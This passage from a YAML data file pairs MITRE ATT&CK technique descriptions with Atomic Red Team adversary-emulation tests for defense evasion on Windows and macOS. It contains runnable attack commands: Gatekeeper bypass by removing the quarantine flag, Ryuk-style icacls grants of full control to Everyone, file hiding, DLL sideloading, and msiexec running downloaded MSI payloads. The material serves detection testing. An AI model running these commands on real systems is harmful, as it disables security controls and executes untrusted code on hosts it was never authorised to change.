in a given environment. [blog post](https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1)
'
supported_platforms:
- windows
input_arguments:
process_name:
description: Name of the created process
type: string
default: calculator.exe
preloader_dll:
description: library for interfacing with the dotnet framework
type: path
default: PathToAtomicsFolder\T1574.002\bin\preloader.dll
dependency_executor_name: powershell
dependencies:
- description: ".Net SDK must be installed\n"
prereq_command: 'if (Test-Path "C:\Program Files\dotnet\dotnet.exe") {exit
0} else {exit 1}
'
get_prereq_command: |
winget install Microsoft.DotNet.SDK.6 --accept-source-agreements --accept-package-agreements -h > $null
echo.
- description: 'preloader must exist
'
prereq_command: 'if (Test-Path "#{preloader_dll}") {exit 0} else {exit 1}
'
get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/bin/preloader.dll?raw=true"
-OutFile "#{preloader_dll}"
'
executor:
command: |
set DOTNET_STARTUP_HOOKS="#{preloader_dll}"
dotnet -h > nul
echo.
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
'
name: command_prompt
- name: DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE
auto_generated_guid: c095ad8e-4469-4d33-be9d-6f6d1fb21585
description: 'Various threat actors and malware have been found side loading
a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe", which can load
further executables embedded in modified KeyScramblerIE.dll file.
'
supported_platforms:
- windows
executor:
command: |-
Write-Host 1.Downloading KeyScrambler from official website to temp directory
Invoke-WebRequest -Uri "https://download.qfxsoftware.com/download/latest/KeyScrambler_Setup.exe" -OutFile $env:Temp\KeyScrambler_Setup.exe
Write-Host 2.Installing KeyScrambler with KeyScrambler_Setup.exe from temp directory
Start-Process -FilePath $env:Temp\KeyScrambler_Setup.exe -ArgumentList /S -Wait
Write-Host 3.Copying KeyScrambler.exe to temp folder,to avoid permission issues, which calls KeyScramblerIE.dll in CWD i.e. temp
Copy-Item "C:\Program Files (x86)\KeyScrambler\KeyScrambler.exe" -Destination $env:TEMP\KeyScrambler.exe
Write-Host 4.Executing KeyScrambler.exe, you should see a popup of missing KeyScramblerIE.dll, you can close this popup
Start-Process -FilePath $env:Temp\KeyScrambler.exe
Write-Host 5.A modified KeyScramblerIE.dll can be copied to temp, which can be misused by Attacker
cleanup_command: |-
Write-Host 1.Kindly close the popup window asking for KeyScramblerIE.dll ,so that it gets deleted.
Remove-Item -Path $env:Temp\KeyScrambler_Setup.exe
Start-Process -FilePath "C:\Program Files (x86)\KeyScrambler\Uninstall.exe" -ArgumentList /S -Wait
Remove-Item -Path $env:Temp\KeyScrambler.exe
Write-Host 2.KeyScrambler cleanup completed successfully.
name: powershell
elevation_required: true
T1553.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e
created: '2020-02-05T16:16:08.471Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553/001
external_id: T1553.001
- source_name: Application Bundle Manipulation Brandon Dalton
description: 'Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking
macOS security controls to thwart application bundle manipulation. Retrieved
September 27, 2022.'
url: https://redcanary.com/blog/mac-application-bundles/
- source_name: theevilbit gatekeeper bypass 2021
description: Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again).
Retrieved September 22, 2021.
url: https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/
- source_name: OceanLotus for OS X
description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application
Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.
url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
- source_name: TheEclecticLightCompany Quarantine and the flag
description: hoakley. (2020, October 29). Quarantine and the quarantine flag.
Retrieved September 13, 2021.
url: https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/
- source_name: 'TheEclecticLightCompany apple notarization '
description: How Notarization Works. (2020, August 28). How notarization works.
Retrieved September 13, 2021.
url: https://eclecticlight.co/2020/08/28/how-notarization-works/
- source_name: 20 macOS Common Tools and Techniques
description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:36.535Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:
1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)
2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.
3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.
4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.
Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)
Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- Swasti Bhushan Deb, IBM India Pvt. Ltd.
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.3'
identifier: T1553.001
atomic_tests:
- name: Gatekeeper Bypass
auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
description: 'Gatekeeper Bypass via command line
'
supported_platforms:
- macos
input_arguments:
app_path:
description: Path to app to be used
type: path
default: myapp.app
executor:
command: 'xattr -d com.apple.quarantine #{app_path}
'
name: sh
T1553.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082
created: '2020-02-05T16:27:37.784Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553/002
external_id: T1553.002
- source_name: EclecticLightChecksonEXECodeSigning
description: 'Howard Oakley. (2020, November 16). Checks on executable code
in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.'
url: https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/
- source_name: Securelist Digital Certificates
description: Ladikov, A. (2015, January 29). Why You Shouldn’t Completely
Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.
url: https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
- source_name: Symantec Digital Certificates
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
url: http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates
- source_name: Wikipedia Code Signing
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
url: https://en.wikipedia.org/wiki/Code_signing
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:37.098Z'
name: Code Signing
description: "Adversaries may create, acquire, or steal code signing materials
to sign their malware or tools. Code signing provides a level of authenticity
on a binary from the developer and a guarantee that the binary has not been
tampered with. (Citation: Wikipedia Code Signing) The certificates used during
an operation may be created, acquired, or stolen by the adversary. (Citation:
Securelist Digital Certificates) (Citation: Symantec Digital Certificates)
Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001),
this activity will result in a valid signature.\n\nCode signing to verify
software on first run can be used on modern Windows and macOS systems. It
is not used on Linux due to the decentralized nature of the platform. (Citation:
Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode
signing certificates may be used to bypass security policies that require
signed code to execute on a system. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Windows
x_mitre_version: '1.2'
atomic_tests: []
T1036.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c
created: '2023-09-27T19:49:40.815Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/009
external_id: T1036.009
- source_name: 3OHA double-fork 2022
description: Juan Tapiador. (2022, April 11). UNIX daemonization and the double
fork. Retrieved September 29, 2023.
url: https://0xjet.github.io/3OHA/2022/04/11/post.html
- source_name: Microsoft XorDdos Linux Stealth 2022
description: 'Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos:
A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved
September 27, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/
- source_name: Sandfly BPFDoor 2022
description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive
Linux Backdoor Technical Analysis. Retrieved September 29, 2023.
url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:54:02.243Z'
name: Break Process Trees
description: "An adversary may attempt to evade process tree-based analysis
by modifying executed malware's parent process ID (PPID). If endpoint protection
software leverages the “parent-child\" relationship for detection, breaking
this relationship could result in the adversary’s behavior not being associated
with previous process tree activity. On Unix-based systems breaking this process
tree is common practice for administrators to execute software using scripts
and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries
may execute a series of [Native API](https://attack.mitre.org/techniques/T1106)
calls to alter malware's process tree. For example, adversaries can execute
their payload without any arguments, call the `fork()` API call twice, then
have the parent process exit. This creates a grandchild process with no parent
process that is immediately adopted by the `init` system process (PID 1),
which successfully disconnects the execution of the adversary's payload from
its previous process tree.\n\nAnother example is using the “daemon” syscall
to detach from the current parent process and run in the background.(Citation:
Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tim (Wadhwa-)Brown
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
x_mitre_version: '1.0'
atomic_tests: []
T1222.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee
created: '2020-02-04T19:17:41.767Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1222/001
external_id: T1222.001
- source_name: Hybrid Analysis Icacls1 June 2018
description: Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe.
Retrieved August 19, 2018.
url: https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100
- source_name: Hybrid Analysis Icacls2 May 2018
description: Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll.
Retrieved August 19, 2018.
url: https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110
- source_name: Microsoft Access Control Lists May 2018
description: M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved
February 4, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists
- source_name: Microsoft DACL May 2018
description: Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19,
2018.
url: https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces
- source_name: EventTracker File Permissions Feb 2014
description: Netsurion. (2014, February 19). Monitoring File Permission Changes
with the Windows Security Log. Retrieved August 19, 2018.
url: https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:37.826Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1222.001
atomic_tests:
- name: Take ownership using takeown utility
auto_generated_guid: 98d34bb4-6e75-42ad-9c41-1dae7dc6a001
description: |
Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will
be displayed for the folder and each file inside of it.
supported_platforms:
- windows
input_arguments:
file_folder_to_own:
description: Path of the file or folder for takeown to take ownership.
type: path
default: "%temp%\\T1222.001_takeown_folder"
dependency_executor_name: command_prompt
dependencies:
- description: 'Test requrires a file to take ownership of to be located at
(#{file_folder_to_own})
'
prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: |
mkdir #{file_folder_to_own}
echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt
echo T1222.001_takeown2 >> #{file_folder_to_own}\T1222.001_takeown2.txt
executor:
command: 'takeown.exe /f #{file_folder_to_own} /r
'
name: command_prompt
- name: cacls - Grant permission to specified user or group recursively
auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485
description: |
Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If "Access is denied"
is displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, "Successfully processed 3 files"
will be displayed.
supported_platforms:
- windows
input_arguments:
file_or_folder:
description: Path of the file or folder to change permissions.
type: path
default: "%temp%\\T1222.001_cacls"
user_or_group:
description: User or group to allow full control
type: string
default: Everyone
dependency_executor_name: command_prompt
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
'
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt
echo T1222.001_cacls2 >> #{file_or_folder}\T1222.001_cacls2.txt
executor:
command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F
'
name: command_prompt
- name: attrib - Remove read-only attribute
auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0
description: |
Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed.
Open the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.
supported_platforms:
- windows
input_arguments:
file_or_folder:
description: Path of the file or folder remove attribute.
type: path
default: "%temp%\\T1222.001_attrib"
dependency_executor_name: command_prompt
dependencies:
- description: 'Test requrires a file to modify to be located at (#{file_or_folder})
'
prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
attrib.exe +r #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe +r #{file_or_folder}\T1222.001_attrib2.txt
executor:
command: 'attrib.exe -r #{file_or_folder}\*.* /s
'
name: command_prompt
- name: attrib - hide file
auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c
description: |
Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that
the victim does not see the file.
supported_platforms:
- windows
input_arguments:
file_or_folder:
description: Path of the files to hide.
type: path
default: "%temp%\\T1222.001_attrib_2"
executor:
command: |
mkdir #{file_or_folder} >nul 2>&1
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
'
name: command_prompt
- name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style
auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
description: |
Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone.
**icacls "C:\*" /grant Everyone:F /T /C /Q**
However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host.
You can set your own path variable to "C:\*" if you prefer.
supported_platforms:
- windows
input_arguments:
path:
description: Path of folder to recursively set permissions on
type: path
default: C:\Users\Public\*
file_path:
description: Path of folder permission back
type: path
default: "%temp%\\T1222.001-folder-perms-backup.txt"
dependency_executor_name: command_prompt
dependencies:
- description: 'Backup of original folder permissions should exist (for use
in cleanup commands)
'
prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
'
get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1
'
executor:
command: icacls "#{path}" /grant Everyone:F /T /C /Q
cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: SubInAcl Execution
auto_generated_guid: a8568b10-9ab9-4140-a523-1c72e0176924
description: This test simulates an adversary executing the Windows Resource
kit utility SubInAcl. This utility was abused by adversaries in the past in
order to modify access permissions. Upon execution, a process creation log
should be generated indicating successful execution.
supported_platforms:
- windows
input_arguments:
SubInAclDownloadPath:
type: string
default: https://web.archive.org/web/20120528222424if_/http://download.microsoft.com/download/1/7/d/17d82b72-bc6a-4dc8-bfaa-98b37b22b367/subinacl.msi
description: Download URL for SubInAcl
dependency_executor_name: powershell
dependencies:
- description: 'Download subinacl
'
prereq_command: 'if (Test-Path "Test-Path C:\Program Files (x86)\Windows Resource
Kits\Tools\subinacl.exe") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Path C:\Users\Public\SubInAcl -ItemType Directory | Out-Null
Invoke-WebRequest #{SubInAclDownloadPath} -OutFile C:\Users\Public\SubInAcl\SubInAcl.msi
msiexec.exe /i "C:\Users\Public\SubInAcl\SubInAcl.msi" /qn
executor:
command: '"C:\Program Files (x86)\Windows Resource Kits\Tools\subinacl.exe"'
name: command_prompt
elevation_required: true
T1574.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--356662f7-e315-4759-86c9-6214e2a50ff8
created: '2024-03-28T15:36:34.141Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/014
external_id: T1574.014
- source_name: PenTestLabs AppDomainManagerInject
description: Administrator. (2020, May 26). APPDOMAINMANAGER INJECTION AND
DETECTION. Retrieved March 28, 2024.
url: https://pentestlaboratories.com/2020/05/26/appdomainmanager-injection-and-detection/
- source_name: Microsoft App Domains
description: Microsoft. (2021, September 15). Application domains. Retrieved
March 28, 2024.
url: https://learn.microsoft.com/dotnet/framework/app-domains/application-domains
- source_name: PwC Yellow Liderc
description: PwC Threat Intelligence. (2023, October 25). Yellow Liderc ships
its scripts and delivers IMAPLoader malware. Retrieved March 29, 2024.
url: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
- source_name: Rapid7 AppDomain Manager Injection
description: 'Spagnola, N. (2023, May 5). AppDomain Manager Injection: New
Techniques For Red Teams. Retrieved March 29, 2024.'
url: https://www.rapid7.com/blog/post/2023/05/05/appdomain-manager-injection-new-techniques-for-red-teams/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T21:48:08.401Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
the `AppDomainManager` class to create and manage one or more isolated runtime
environments (called application domains) inside a process to host the execution
of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run
as .NET code) may be loaded into an application domain as executable code.(Citation:
Microsoft App Domains) \n\nKnown as \"AppDomainManager injection,\" adversaries
may execute arbitrary code by hijacking how .NET applications load assemblies.
For example, malware may create a custom application domain inside a target
process to load and execute an arbitrary assembly. Alternatively, configuration
files (`.config`) or process environment variables that define .NET runtime
settings may be tampered with to instruct otherwise benign .NET applications
to load a malicious assembly (identified by name) into the target process.(Citation:
PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation:
Rapid7 AppDomain Manager Injection)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Thomas B
- Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1218.007:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336
created: '2020-01-24T14:38:49.266Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/007
external_id: T1218.007
- source_name: TrendMicro Msiexec Feb 2018
description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows
Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.
url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
- source_name: LOLBAS Msiexec
description: LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
- source_name: Microsoft msiexec
description: Microsoft. (2017, October 15). msiexec. Retrieved January 24,
2020.
url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
- source_name: Microsoft AlwaysInstallElevated 2018
description: Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December
14, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:38.626Z'
name: 'Signed Binary Proxy Execution: Msiexec'
description: |-
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Ziv Kaspersky, Cymptom
- Alexandros Pappas
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1218.007
atomic_tests:
- name: Msiexec.exe - Execute Local MSI file with embedded JScript
auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
description: 'Executes an MSI containing embedded JScript code using msiexec.exe
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_JScript.msi
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
types.
'
type: string
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi" -OutFile "#{msi_payload}"
executor:
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with embedded VBScript
auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
'
supported_platforms:
- windows
input_arguments:
msi_payload:
description: MSI file to execute
type: path
default: PathToAtomicsFolder\T1218.007\bin\T1218.007_VBScript.msi
msi_exe:
description: MSIExec File Path
type: path
default: c:\windows\system32\msiexec.exe
action:
description: 'Specifies the MSI action to perform: i (install), a (admin),
j (advertise). The included MSI is designed to support all three action
types.
'
type: string
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
'
prereq_command: 'if (Test-Path "#{msi_payload}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{msi_payload}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_VBScript.msi" -OutFile "#{msi_payload}"
executor:
command: '#{msi_exe} /q /#{action} "#{msi_payload}"
'
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded DLL
auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
description: 'Executes an MSI containing an embedded DLL using msiexec.exe
'
supported_platforms:
- windows
input_arguments:
